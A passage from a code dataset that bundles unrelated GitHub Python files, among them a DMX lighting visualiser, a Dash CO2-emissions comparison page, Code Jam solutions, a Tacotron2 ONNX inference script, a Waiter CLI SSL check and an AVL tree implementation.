pygame.draw.rect(window,srgb,spos)\n\n\n\nGRID = []\nNR = 0\nSTART_UNIV=2\n\ndef main():\n global IP,GRID,FUNC\n\n counter = time.time()\n GRID = init_grid() #init_gird()\n print(\"GRID LEN:\",len(GRID))\n\n\n s=time.time()\n print(\"run\")\n r = \"\"\n IP = \"xx\"\n while running:\n pygame.display.flip()\n event()\n\n window.fill((0,0,0))\n calc_fps()\n draw_overlay()\n\n ips = read_index()\n ip = select_ip(ips,univ=START_UNIV)\n IP = ip\n #print(\"IP\",ip)\n\n data = read_dmx(ip)\n\n ip = select_ip(ips,univ=START_UNIV+1)\n data3 = read_dmx(ip)\n data.extend(data3)\n\n ip = select_ip(ips,univ=START_UNIV+2)\n data3 = read_dmx(ip)\n data.extend(data3)\n\n #ip = select_ip(ips,univ=START_UNIV+4)\n #data3 = read_dmx(ip)\n #data.extend(data3)\n # GRID loop\n try:\n ddd = 1023 #univ 3 512\n FUNC = data[ddd]\n #print(\"FUNC\", FUNC )#:ddd+512])\n #FUNC = 15\n except Exception as e:\n print(\"EXC FUNC\",e)\n i = 0\n dmx = 1\n h = 1\n v = 1\n for fix in GRID:\n pos = fix.POS(40,60)\n rgb = fix.rgb\n\n\n if 1:\n # draw row/col grid number\n if fix.pos[0] == 0:\n fr = font12.render(\"{}\".format(fix.pos[1]+1) ,1, (200,200,200))\n window.blit(fr,(10,pos[1]+3 ))\n if fix.pos[1] == 0:\n fr = font12.render(\"{}\".format(fix.pos[0]+1) ,1, (200,200,200))\n window.blit(fr,(pos[0]+2,35 ))\n\n pygame.draw.rect(window,rgb,pos)\n\n\n # DRAW SUB-FIXTURE\n j = 0\n for subfix in fix.sub_fix:#calc(data):\n subfix.calc(data)\n #fix = subfix\n spos = subfix.POS(40,60)\n srgb = subfix.rgb\n \n draw_gobo(window,FUNC,spos=spos,srgb=srgb)\n\n\n\n\n # draw row/col grid number\n if subfix.pos[0] == 0:\n fr = font12.render(\"{}\".format(v ) ,1, (200,200,200))\n window.blit(fr,(25,spos[1] ))\n v += 1\n if subfix.pos[1] == 0:\n fr = font12.render(\"{}\".format(1) ,1, (200,200,200))\n fr = font12.render(\"{}\".format(h ) ,1, (200,200,200))\n h+=1\n window.blit(fr,(spos[0],50 ))\n\n\n if p >= 40:\n if NR:\n #fr = font15.render(\"{:02}\".format(j+1) ,1, (0,200,255))\n fr = font15.render(\"{:02}\".format(subfix._id) ,1, (250,200,5))\n window.blit(fr,(spos[0]+2,spos[1]+10))\n j += 1\n i += 1\n\n\n # DRAW FIX NUMBER on TOP\n i=0\n for fix in GRID:\n pos = fix.POS(40,60)\n rgb = fix.rgb\n if NR:\n pygame.draw.rect(window,[0,0,0],[pos[0]+2,pos[1]+2,12,9])\n\n #if NR == 1:\n # fr = font15.render(\"{:02}\".format(i+1) ,1, (200,0,255))\n # window.blit(fr,(pos[0]+2,pos[1]+2))\n #elif NR == 2:\n if NR:# == 2:\n if counter +5 < time.time():\n counter = time.time()\n try:\n GRID = init_grid() #init_gird()\n except Exception as e:\n print(\"Except: grid re init\",e)\n if fix._id != i+1:\n fr = font15.render(\"{:02}\".format(fix._id) ,1, (255,255,0))\n else:\n fr = font15.render(\"{:02}\".format(fix._id) ,1, (100,100,255))\n window.blit(fr,(pos[0]+2,pos[1]+2))\n i += 1\n \n \n #color=window.get_at((70, 70))\n #print(\"pix\",color)\n #surface.set_at((x, y), color)\n\n #from pygame import gfxdraw\n #gfxdraw.pixel(surface, x, y, color)\n \n pointer.draw()\n pygame.display.flip()\n pg.time.wait(30)\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"micox4356/LibreLight","sub_path":"vpu/vpu2_live.py","file_name":"vpu2_live.py","file_ext":"py","file_size_in_byte":21303,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"70171736836","text":"import dash\nfrom dash import html, dcc, Input, Output, callback\nimport dash_bootstrap_components as dbc\nimport plotly.express as px\nfrom download_data import co2_data_countries, codebook\nimport utils as u\n\ndash.register_page(__name__, order=2)\n\n# Palette:\n# #002B36 - dark blue\n# #A4C9D7 - light blue\n# #D07C2E - orange\n# #F1F1E6 - gray\n\n# Build sidebar\ncompare_sidebar_style = \\\n {\n \"position\": \"relative\",\n \"top\": 0,\n \"left\": 0,\n \"bottom\": 0,\n \"padding\": \"1rem 1rem\",\n #\"background-color\": \"#002b36\",\n #\"color\": \"#D07C2E\",\n }\n\ncompare_sidebar = \\\n dbc.Container(\n [\n html.H2(\"Filters\"),\n html.Hr(),\n dbc.Nav(\n [\n html.P(\n \"Countries\", className=\"lead\"\n ),\n dcc.Dropdown(\n co2_data_countries.country.unique(),\n co2_data_countries.country.unique()[0],\n id='compare-country-selector',\n placeholder='Select one or more countries...',\n multi=True\n ),\n html.P(children=\"\", id='compare-country-error-display',\n style={'font-weight': 'bold', 'font-style': 'italics'}),\n html.P(\n \"Dataset\", className=\"lead\"\n ),\n dcc.Dropdown(\n co2_data_countries.loc[:, ~co2_data_countries.columns.isin(\n ['country', 'year', 'iso_code'])].columns,\n 'co2',\n id='compare-dataset-selector',\n placeholder='Select a dataset to plot...'\n ),\n html.P(children=\"\", style={'font-weight': 'bold', 'font-style': 'italics'},\n id='compare-dataset-error-display'),\n html.A(\"Dataset definitions\",\n href='https://github.com/owid/co2-data/blob/master/owid-co2-codebook.csv',\n target=\"_blank\")\n ],\n vertical=True,\n pills=True\n ),\n ],\n style=compare_sidebar_style,\n fluid=True\n )\n\nlayout = dbc.Container(\n [\n dbc.Row(\n [\n dbc.Col(\n dbc.Card(\n dbc.CardBody(\n compare_sidebar, style={'margin-left': '-20px', 'margin-right': '-20px'}\n )\n ),\n width=3\n ),\n dbc.Col(\n [\n html.H2(style={'textAlign': 'left', 'margin-left': '7px', 'margin-top': '1rem',\n 'color': '#D07C2E', 'font-weight': 'bold'},\n children='Compare'),\n html.P(style={'textAlign': 'left', 'margin-left': '7px', 'margin-top': '7px',\n 'color': '#D07C2E', 'font-style': 'italics'},\n children=\n '''\n Compare countries' GHG emission trajectories over time\n '''),\n html.Hr(),\n dcc.Graph(\n id='compare-timeseries-plot',\n ),\n dcc.RangeSlider(\n co2_data_countries['year'].min(),\n co2_data_countries['year'].max(),\n step=None,\n value=[co2_data_countries['year'].max() - 20, co2_data_countries['year'].max()],\n marks={str(year): str(year) for year in co2_data_countries['year'].unique()\n if year % 10 == 0},\n allowCross=True,\n included=True,\n id='compare-year-slider'\n ),\n html.A(id='compare-dataset-explainer')\n ]\n )\n ]\n )\n ],\n fluid=True,\n class_name=\"g-0\"\n)\n\n\n@callback(\n Output('compare-timeseries-plot', 'figure'),\n Output('compare-country-error-display', 'children'),\n Output('compare-dataset-error-display', 'children'),\n Output('compare-dataset-explainer', 'children'),\n Input('compare-year-slider', 'value'),\n Input('compare-country-selector', 'value'),\n Input('compare-dataset-selector', 'value'))\ndef update_timeseries_plot(year_range, country_value, dataset_value):\n # check if more than one country has been passed\n if isinstance(country_value, list):\n # if country-selector value is a list, there is more than one country selected, then .isin() should be used\n selected_country_df = co2_data_countries[co2_data_countries['country'].isin(country_value)]\n else:\n # if it's not a list, only one country is selected, which means we should use boolean comparison to select\n selected_country_df = co2_data_countries[co2_data_countries['country'] == country_value]\n\n # check if no countries provided, return an error and don't update dashboard\n if not country_value:\n return dash.no_update, html.P(f'Please select one or more countries.', style={\n 'font-weight': 'bold', 'font-style': 'italics', 'color': '#D07C2E'}), dash.no_update, dash.no_update\n\n # check if no dataset selected, return an error and don't update dashboard\n if not dataset_value:\n return dash.no_update, dash.no_update, html.P(f'Please select a dataset.', style={\n 'font-weight': 'bold', 'font-style': 'italics', 'color': '#D07C2E'}), dash.no_update\n\n # use the utils function to find the dataset for only the selected countries and years\n df = u.find_country_range_data(selected_country_df, dataset_value, country_value, year_range[0], year_range[1])\n\n # define the parameters of the line plot and update the data\n fig = px.line(df, x='year', y=df.columns)\n \n fig.update_xaxes(\n title_text='Year',\n title_standoff=25,\n showgrid=True, gridcolor='#1e434a', tickfont=dict(color='#839496'), title_font=dict(color='#839496')\n )\n fig.update_yaxes(\n title_text=f\"{dataset_value} *\",\n title_standoff=25,\n showgrid=True, gridcolor='#1e434a', tickfont=dict(color='#839496'), title_font=dict(color='#839496')\n )\n fig.update_layout(transition_duration=100, plot_bgcolor= \"#002b36\", paper_bgcolor=\"#1e434a\", \n legend=dict(title_font=dict(color='#839496'),font=dict(color='#839496')))\n\n # access codebook for full description of selected dataset to be updated under scatter plot\n dataset_codebook_description = codebook.loc[codebook['column'] == dataset_value]['description'].values[0]\n dataset_def = f\"* {dataset_value}: {dataset_codebook_description}\"\n\n return fig, None, None, dataset_def\n\n","repo_name":"cedrichille/historical-co2-data","sub_path":"pages/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23415456351","text":"import sys\n\nif __name__ == '__main__':\n f = sys.stdin\n if len(sys.argv) >= 2:\n fn = sys.argv[1]\n if fn != '-':\n f = open(fn)\n output = open('jam1.out', 'w')\n t = int(f.readline())\n for test in xrange(1, t+1):\n str1 = \"Case #%d: \" %(test)\n output.write(str1)\n x = int(f.readline())\n arr1 = []\n for i in range(4):\n line = map(int, f.readline().split())\n arr1.append(line)\n y = int(f.readline())\n arr2 = []\n for j in range(4):\n line = map(int, f.readline().split())\n arr2.append(line)\n cnt = 0\n ans = -1\n for i in range(4):\n for j in range(4):\n if arr1[x-1][i] == arr2[y-1][j]:\n ans = arr1[x-1][i]\n cnt += 1\n if cnt == 0:\n output.write(\"Volunteer cheated!\\n\")\n elif cnt == 1:\n output.write(str(ans) + \"\\n\")\n else:\n output.write(\"Bad magician!\\n\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3002.py","file_name":"3002.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42713782596","text":"from collections import deque\n\n\ndef rotate90(key):\n copied = key[:]\n copied.reverse()\n return list(map(list, zip(*copied)))\n\n\ndef size_up(key, n):\n m = len(key)\n if n == m:\n return key\n\n diff = n-m\n new_key = []\n added_row = [0 for _ in range(diff)]\n for row in key:\n new_key.append(row + added_row)\n\n zero_row = [0 for _ in range(n)]\n for i in range(diff):\n new_key.append(zero_row)\n\n return new_key\n\n\ndef move_up(key):\n n = len(key)\n new_key = []\n for i in range(1, n):\n new_key.append(key[i])\n new_key.append([0 for i in range(n)])\n return new_key\n\n\ndef move_down(key):\n n = len(key)\n new_key = []\n new_key.append([0 for i in range(n)])\n for i in range(n-1):\n new_key.append(key[i])\n\n return new_key\n\n\ndef move_right(key):\n n = len(key)\n new_key = []\n for row in key:\n new_key.append([0]+row[:n-1])\n return new_key\n\n\ndef move_left(key):\n n = len(key)\n new_key = []\n for row in key:\n new_key.append(row[1:]+[0])\n return new_key\n\n\ndef is_matched(key, lock):\n '''\n print(\"is matched\")\n for i in range(len(key)):\n print(key[i], \" \", lock[i])\n '''\n n = len(key)\n for i in range(n):\n for j in range(n):\n if key[i][j] == lock[i][j]:\n return False\n return True\n\n\n# l,u / l,d / r,u / r,d\ndef simulate(key, lock, left_or_right, up_or_down):\n n = len(lock)\n visit = [[[False for _ in range(n+1)]\n for __ in range(n+1)] for _____ in range(4)]\n\n q = deque()\n rotated_key1 = rotate90(key)\n rotated_key2 = rotate90(rotated_key1)\n rotated_key3 = rotate90(rotated_key2)\n\n q.append((key, 0, 0, 0))\n q.append((rotated_key1, 1, 0, 0))\n q.append((rotated_key2, 2, 0, 0))\n q.append((rotated_key3, 3, 0, 0))\n\n while len(q) > 0:\n (current_key, rotate_count, lr, ud) = q.popleft()\n\n if lr > n or ud > n:\n continue\n\n if visit[rotate_count][lr][ud]:\n continue\n\n visit[rotate_count][lr][ud] = True\n\n if is_matched(current_key, lock):\n return True\n\n if left_or_right == 'left':\n q.append((move_left(current_key), rotate_count, lr+1, ud))\n else:\n q.append((move_right(current_key), rotate_count, lr+1, ud))\n\n if up_or_down == 'up':\n q.append((move_up(current_key), rotate_count, lr, ud+1))\n else:\n q.append((move_down(current_key), rotate_count, lr, ud+1))\n\n return False\n\n\ndef solution(key, lock):\n\n key = size_up(key, len(lock))\n\n # l,u / l,d / r,u / r,d\n if simulate(key, lock, 'left', 'up'):\n return True\n if simulate(key, lock, 'left', 'down'):\n return True\n if simulate(key, lock, 'right', 'up'):\n return True\n if simulate(key, lock, 'right', 'down'):\n return True\n\n return False\n\n\nkey = [[1, 1, 1, 1], [2, 1, 1, 1], [3, 1, 1, 1], [4, 1, 1, 1]]\nlock = [[1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 0]]\n\nprint(solution(key, lock))\n","repo_name":"SJ0000/PS","sub_path":"Programmers/60059.py","file_name":"60059.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13692682698","text":"import onnx\nimport onnxruntime\nimport numpy as np\nfrom scipy.io import wavfile\nfrom text import text_to_sequence\n\nnp.set_printoptions(threshold=np.inf)\n\ndef encoder_infer(input_data, encoder_model):\n session = onnxruntime.InferenceSession(encoder_model.SerializeToString())\n sequences = session.get_inputs()[0].name\n sequence_lengths = session.get_inputs()[1].name\n print(\"input_name_1: \", sequences)\n print(\"input_name_2: \", sequence_lengths)\n outputs = session.run([\"memory\", \"processed_memory\", \"lens\"],{sequences:input_data[0], sequence_lengths:input_data[1]})\n return outputs\n\ndef decoder_infer(decoder_inputs, decoder_model):\n session = onnxruntime.InferenceSession(decoder_model.SerializeToString())\n # 1. decoder_input\n # 2. attention_hidden\n # 3. attention_cell\n # 4. decoder_hidden\n # 5. decoder_cell\n # 6. attention_weights\n # 7. attention_weights_cum\n # 8. attention_context\n # 9. memory\n # 10. processed_memory\n # 11. mask\n input_names = []\n for input in session.get_inputs():\n input_names.append(input.name)\n\n output_names = []\n for output in session.get_outputs():\n output_names.append(output.name)\n\n # print(\"output names: \", output_names)\n\n inputs_dict = {}\n for i in range(11):\n inputs_dict[input_names[i]] = decoder_inputs[i]\n\n decoder_outputs = session.run([], inputs_dict)\n\n return decoder_outputs\n\ndef decoder_iter_infer(decoder_inputs, decoder_model, threshold = 0.5):\n count = 0\n mel_counts = [0] * decoder_inputs[0].shape[0]\n\n outputs = 0\n\n decoder_predicts = []\n\n gate_ones = np.ones(decoder_input.shape[0])\n\n while True:\n outputs = decoder_infer(decoder_inputs, decoder_model)\n assert(len(outputs) == 9)\n decoder_predicts.append(outputs[0])\n\n decoder_inputs[0] = outputs[0]\n for i in range(1, 8):\n decoder_inputs[i] = outputs[i + 1]\n\n gate = outputs[1]\n\n gate = 1/(1+np.exp(-gate)).flatten()\n\n gate = (gate < threshold).astype(np.int)\n gate_temp = gate_ones\n gate_ones = gate_ones * gate\n\n for i in range(len(gate_temp)):\n if gate_temp[i] == 1 and gate_ones[i] == 0:\n mel_counts[i] = count\n\n count += 1\n\n print(\"iter times : \", count)\n print(\"gate : \", gate_ones)\n print(\"The {} times gate is : {}\".format(count, gate_ones))\n\n if gate_ones.sum() == 0:\n break\n\n return decoder_predicts, mel_counts\n\ndef postnet_infer(postnet_inputs, postnet_model):\n session = onnxruntime.InferenceSession(postnet_model.SerializeToString())\n mel_outputs = session.get_inputs()[0].name\n\n postnet_outputs = session.run([],{mel_outputs:postnet_inputs})\n return postnet_outputs\n\ndef waveglow_infer(waveglow_inputs, postnet_model):\n session = onnxruntime.InferenceSession(postnet_model.SerializeToString())\n mel = session.get_inputs()[0].name\n z = session.get_inputs()[1].name\n\n waveglow_outputs = session.run([], {mel : waveglow_inputs[0], z : waveglow_inputs[1]})\n return waveglow_outputs\n\ndef save_wav(wav, path, sr):\n wav = np.array(wav).astype(np.float)\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n wavfile.write(path, sr, wav.astype(np.int16))\n\ndef file_to_audio(audio_data, mel_len):\n sampling_rate = 22050\n result = audio_data.astype(np.float32)\n if mel_len > 0:\n # Cut to real mel_len.\n # For example, prediction report \"60 gate = 0.998607\" as latest, mel_len is 60\n result = result[0 : mel_len * 8 * 32]\n if len(result) > 0:\n save_wav(result, \"tacotron2_onnx_models/mtn_test_batch8_process.wav\", sampling_rate)\n\ndef change_model_input_batch(batch, model):\n names_to_change_list = [\"sequences\", \"sequence_lengths\",\n \"decoder_input\", \"attention_hidden\", \"attention_cell\", \"decoder_hidden\",\n \"decoder_cell\", \"attention_weights\", \"attention_weights_cum\", \"attention_context\",\n \"memory\", \"processed_memory\", \"mask\",\n \"mel_outputs\"\n ]\n for input in model.graph.input:\n if input.name in names_to_change_list:\n dim_proto0 = input.type.tensor_type.shape.dim[0]\n dim_proto0.dim_value = batch\n\ndef change_model_output_batch(batch, model):\n names_to_change_list = [\"memory\", \"processed_memory\", \"lens\",\n \"decoder_output\", \"gate_prediction\", \"out_attention_hidden\", \"out_attention_cell\",\n \"out_decoder_hidden\", \"out_decoder_cell\", \"out_attention_weights\",\n \"out_attention_weights_cum\", \"out_attention_context\",\n \"mel_outputs_postnet\"\n ]\n for output in model.graph.output:\n if output.name in names_to_change_list:\n dim_proto0 = output.type.tensor_type.shape.dim[0]\n dim_proto0.dim_value = batch\n\nif __name__ == \"__main__\":\n # ============================= step 1 : input prepare ===============================\n words_index = []\n\n text = [\"Bi Ren Technology is China's greatest chip company .\",\n \"Responsibility excellance collaboration innovation pragmatism empowering\",\n \"No boundaries, no challenges, pursuit excellence and Dare to be first\",\n \"Printing, in the only sense with which we are at present concerned\",\n \"differs from most if not from all the arts and crafts represented in the Exhibition\",\n \"in being comparatively modern.\",\n \"produced the block books, which were the immediate predecessors of the true printed book\",\n \"And it is worth mention in passing that, as an example of fine typography\"\n ]\n\n for sentence in text:\n word_index_temp = text_to_sequence(sentence, ['english_cleaners'])\n words_index.append(word_index_temp)\n\n sentence_len = [len(item) for item in words_index]\n seq_len = max(sentence_len)\n\n for word_index in words_index:\n if len(word_index) < seq_len:\n word_index.extend([0]*(seq_len-len(word_index)))\n\n decoder_mask = []\n for length in sentence_len:\n mask_data = [0]*length + [1]*(seq_len - length)\n decoder_mask.append(mask_data)\n\n # root_path = \"/home/mtn/suinfer_temp/\"\n root_path = \"/home/mtn/Projects/Onnx_process/tacotron2_onnx_models/\"\n\n encoder_path = root_path + \"encoder.onnx\"\n decoder_path = root_path + \"decoder_iter.onnx\"\n postnet_path = root_path + \"postnet.onnx\"\n waveglow_path = root_path + \"waveglow.onnx\"\n\n # =============================step 2 : infer encoder ================================\n batch = len(words_index)\n\n encoder_model = onnx.load(encoder_path)\n\n change_model_input_batch(batch, encoder_model)\n change_model_output_batch(batch, encoder_model)\n\n sequence_data = np.array(words_index).astype(np.int64) # input1\n # sequence_lengths_data = np.array([seq_len] * batch).astype(np.int64) #input2\n sequence_lengths_data = np.array(sentence_len).astype(np.int64) #input2\n encoder_outputs = encoder_infer([sequence_data, sequence_lengths_data], encoder_model) # infer\n\n # =============================step 3 : infer decoder ==========================\n\n decoder_model = onnx.load(decoder_path)\n\n change_model_input_batch(batch, decoder_model)\n change_model_output_batch(batch, decoder_model)\n\n decoder_inputs = []\n\n # input 1\n decoder_input = np.array([0]*batch*80).astype(np.float16).reshape((batch, 80))\n decoder_inputs.append(decoder_input)\n # input 2\n attention_hidden = np.array([0]*batch*1024).astype(np.float16).reshape((batch, 1024))\n decoder_inputs.append(attention_hidden)\n # input 3\n attention_cell = np.array([0]*batch*1024).astype(np.float16).reshape((batch, 1024))\n decoder_inputs.append(attention_cell)\n # input 4\n decoder_hidden = np.array([0]*batch*1024).astype(np.float16).reshape((batch, 1024))\n decoder_inputs.append(decoder_hidden)\n # input 5\n decoder_cell = np.array([0]*batch*1024).astype(np.float16).reshape((batch, 1024))\n decoder_inputs.append(decoder_cell)\n # input 6\n attention_weights = np.array([0]*batch*seq_len).astype(np.float16).reshape((batch, seq_len))\n decoder_inputs.append(attention_weights)\n # input 7\n attention_weights_cum = np.array([0]*batch*seq_len).astype(np.float16).reshape((batch, seq_len))\n decoder_inputs.append(attention_weights_cum)\n # input 8\n attention_context = np.array([0]*batch*512).astype(np.float16).reshape((batch, 512))\n decoder_inputs.append(attention_context)\n # input 9\n memory = encoder_outputs[0] # form encpder:memory --> (batch, seq, 512)\n decoder_inputs.append(memory)\n # input 10\n processed_memory = encoder_outputs[1] # from encoder: processed_memory --> (batch, seq, 128)\n decoder_inputs.append(processed_memory)\n # input 11\n mask = np.array(decoder_mask).astype(np.bool)\n decoder_inputs.append(mask)\n\n # decoder inference\n decoder_outputs, mel_lens = decoder_iter_infer(decoder_inputs, decoder_model) # (batch, 80, mel_len) : mel_len is random\n\n decoder_outputs_unsequence = []\n for item in decoder_outputs:\n decoder_outputs_unsequence.append(item.reshape(batch, 80, 1))\n\n mel_outputs = np.concatenate(decoder_outputs_unsequence, axis=2)\n\n # ================================step 4 : infer postnet =================================\n\n postnet_model = onnx.load(postnet_path)\n\n change_model_input_batch(batch, postnet_model)\n change_model_output_batch(batch, postnet_model)\n\n postnet_outputs = postnet_infer(mel_outputs, postnet_model)\n\n # print(postnet_outputs[0].shape)\n\n # ================================= step 5 : infer waveglow ================================\n\n waveglow_model = onnx.load(waveglow_path)\n\n\n change_model_input_batch(batch, postnet_model)\n change_model_output_batch(batch, postnet_model)\n\n mel_size = postnet_outputs[0].shape[2] # 367\n stride = 256\n n_group = 8\n z_size = mel_size * stride # 367 * 256\n z_size = z_size // n_group # 367 * 256 / 32\n z = np.random.randn(batch, n_group, z_size).astype(np.float16)\n\n waveglow_outputs = waveglow_infer([postnet_outputs[0], z], waveglow_model)\n\n # ================================== step 6 : save to .wav ==================================\n mels_data = []\n for i in range(batch):\n mel_data = waveglow_outputs[0][i].flatten()\n mel_len = mel_lens[i]\n valid_mel_data = mel_data[0 : mel_len * 256]\n mels_data.extend(valid_mel_data.tolist())\n\n final_data = np.array(mels_data)\n file_to_audio(final_data, 0)\n\n","repo_name":"Elvin-Ma/Onnx_Demo","sub_path":"tacotron_infer_batch.py","file_name":"tacotron_infer_batch.py","file_ext":"py","file_size_in_byte":10231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"12072038267","text":"\nfrom waiter.action import check_ssl\nfrom waiter.util import check_positive, print_error\n\n\ndef ensureSSL(_, args, __, ___):\n \"\"\"Checks the state of SSL for the provided token.\"\"\"\n port=443\n token_name = args.get('token')\n timeout_secs = args.get('timeout', None)\n try:\n check_ssl(token_name, port, timeout_secs)\n # Any exception indicates an issue connecting to or handshaking the backend service\n except Exception as e:\n print_error(e)\n print_error(f'Connection to {token_name}:{port} failed')\n return 1\n return 0\n\n\ndef register(add_parser):\n \"\"\"Adds this sub-command's parser and returns the action function\"\"\"\n default_timeout = 300\n parser = add_parser('ensure-ssl', help='checks if the specified token has SSL set up')\n parser.add_argument('token')\n parser.add_argument('--timeout', '-t', help=f'read timeout (in seconds) for SSL verification request (default is '\n f'{default_timeout} seconds)',\n type=check_positive, default=default_timeout)\n return ensureSSL\n","repo_name":"twosigma/waiter","sub_path":"cli/waiter/subcommands/ssl.py","file_name":"ssl.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"61"} +{"seq_id":"23544299281","text":"#!/usr/bin/python\n\nimport queue\n\ndef solution(S, K):\n sequence = [c == '+' for c in S]\n result = 0\n\n for i in range(len(sequence)):\n if not sequence[i]:\n if i + K > len(S):\n return 'IMPOSSIBLE'\n else:\n #Flip\n for j in range(K):\n sequence[i+j] = not sequence[i+j]\n result += 1\n\n return str(result)\n\ndef main():\n T = int(input())\n for t in range(1, T +1):\n S, K = input().split(' ')\n result = solution(S, int(K))\n print('Case #{}: {}'.format(t, result))\n\nif __name__ == '__main__':\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2725.py","file_name":"2725.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5790799626","text":"import os\n\nimport geopandas as gpd\n\nfrom odysseus.city_data_manager.city_data_source.geo_data_source.geo_data_source import GeoDataSource\n\n\nclass CalgaryHexagonalGrid(GeoDataSource):\n\n def __init__(self):\n super().__init__(\"Calgary\", \"city_of_calgary\")\n\n def load_raw(self):\n raw_geo_data_path = os.path.join(\n self.raw_data_path,\n \"geo_export_edc5528d-f07e-4fd8-9622-be91c874918c.dbf\"\n )\n self.gdf = gpd.read_file(raw_geo_data_path)\n return self.gdf\n\n def normalise(self):\n self.gdf_norm = self.gdf\n self.gdf_norm = self.gdf_norm[[\n \"grid_id\", \"geometry\"\n ]]\n\n self.gdf_norm.to_file(\n os.path.join(\n self.norm_data_path,\n \"hexagonal_grid.shp\"\n )\n )\n return self.gdf_norm\n","repo_name":"smartdatapolito/odysseus","sub_path":"odysseus/city_data_manager/city_data_source/geo_data_source/calgary_hexagonal_grid.py","file_name":"calgary_hexagonal_grid.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"6500079996","text":"class BinaryTree:\n def __init__(self):\n self.root = None\n \n def __iter__(self):\n # 樹中元素的 中序走訪(in-order traversal)\n if self.root:\n return self.root.inorder()\n\n def add(self, value):\n # 將值插入二元樹的適當位置\n if self.root is None:\n self.root = BinaryNode(value)\n else:\n self.root = self.root.add(value)\n\nclass BinaryNode:\n def __init__(self, value = None):\n # 建立二元節點\n self.value = value\n self.left = None\n self.right = None\n self.height = 0\n \n def inorder(self):\n # 紮根於已知節點的樹 的 中序走訪\n if self.left:\n for n in self.left.inorder():\n yield n\n\n yield self.value\n\n if self.right:\n for n in self.right.inorder():\n yield n\n\n def computeHeight(self):\n # 由子節點計算BST中節點的高度\n height = -1\n if self.left:\n height = max(height, self.left.height)\n if self.right:\n height = max(height, self.right.height)\n self.height = height + 1\n \n def heightDifference(self):\n # 計算BST中節點的子節點高度差異\n leftTarget = 0\n rightTarget = 0\n if self.left:\n leftTarget = 1 + self.left.height\n if self.right:\n rightTarget = 1 + self.right.height\n return leftTarget - rightTarget\n \n def add(self, val):\n # 搭配值���所需的再平衡作業,來將新的節點加入BST\n newRoot = self\n if val <= self.value:\n self.left = self.addToSubTree(self.left, val)\n if self.heightDifference() == 2:\n if val <= self.left.value:\n newRoot = self.rotateRight()\n else:\n newRoot = self.rotateLeftRight()\n else:\n self.right = self.addToSubTree(self.right, val)\n if self.heightDifference() == -2:\n if val > self.right.value:\n newRoot = self.rotateLeft()\n else:\n newRoot = self.rotateRightLeft()\n newRoot.computeHeight()\n return newRoot\n \n def addToSubTree(self, parent, val):\n # 將val 加入父的子樹(假如存在的話), 如果因為旋轉作業而有變更, 則傳回其根節點\n if parent is None:\n return BinaryNode(val)\n parent = parent.add(val)\n return parent\n \n def rotateRight(self):\n # 沿著已知的節點執行 向右旋轉\n newRoot = self.left\n grandson = newRoot.right\n self.left = grandson\n newRoot.right = self\n\n self.computeHeight()\n return newRoot\n\n def rotateRightLeft(self):\n # 沿著已知的節點執行右旋轉接著左旋\n child = self.right\n newRoot = child.left\n grand1 = newRoot.left\n grand2 = newRoot.right\n child.left = grand2\n self.right = grand1\n\n newRoot.left = self\n newRoot.right = child\n\n child.computeHeight()\n self.computeHeight()\n return newRoot\n \n def rorateLeft(self):\n # 沿著已知的節點執行 向左旋轉\n newRoot = self.right\n grandson = newRoot.left\n self.right = grandson\n newRoot.right = self\n \n self.computeHeight()\n return newRoot\n \n def rotateLeftRight(self):\n # 沿著已知節點執行左旋轉接著右旋\n child = self.left\n newRoot = child.right\n grand1 = newRoot.left\n grand2 = newRoot.right\n child.right = grand1\n self.left = grand2\n newRoot.left = child\n newRoot.right = self\n\n child.computeHeight()\n self.computeHeight()\n return newRoot\n\n def removeFromParent(self, parent, val):\n # 移除作業的輔助函式. 在移除具有子節點的節點時確保適當的行為\n if parent:\n return parent.remove(val)\n return None\n \n def remove(self, val):\n # 從二元樹移除val. 在二元樹中連同remove方法一起運作\n newRoot = self\n if val == self.value:\n if self.left is None:\n return self.right\n \n child = self.left\n while child.right:\n child = child.right\n\n childKey = child.value\n self.left = self.removeFromParent(self.left, childKey)\n self.value = childKey\n\n if self.heightDifference() == -2:\n if self.right.heightDifference() <= 0:\n newRoot = self.rorateLeft()\n else:\n newRoot = self.rotateRightLeft()\n elif val < self.value:\n self.left = self.removeFromParent(self.left, val)\n if self.heightDifference() == -2:\n if self.right.heightDifference() <= 0:\n newRoot = self.rorateLeft()\n else:\n newRoot = self.rotateRightLeft()\n else:\n self.right = self.removeFromParent(self.right, val)\n if self.heightDifference() == 2:\n if self.left.heightDifference() >= 0:\n newRoot = self.rotateRight()\n else:\n newRoot = self.rotateLeftRight()\n \n newRoot.computeHeight()\n return newRoot\n\nbt = BinaryTree()\nfor i in range(7, 0, -1):\n bt.add(i)\n\nfor v in bt:\n print(v)","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/Algorithm/Search/BST.py","file_name":"BST.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"590539913","text":"import re\nimport json\nimport urllib\nimport dateutil\nfrom dao.conf import UNPROCESSED_BUCKET\n\n\nclass InvalidEventError(Exception):\n pass\n\n\nclass InvalidEventDataError(InvalidEventError):\n pass\n\n\nclass 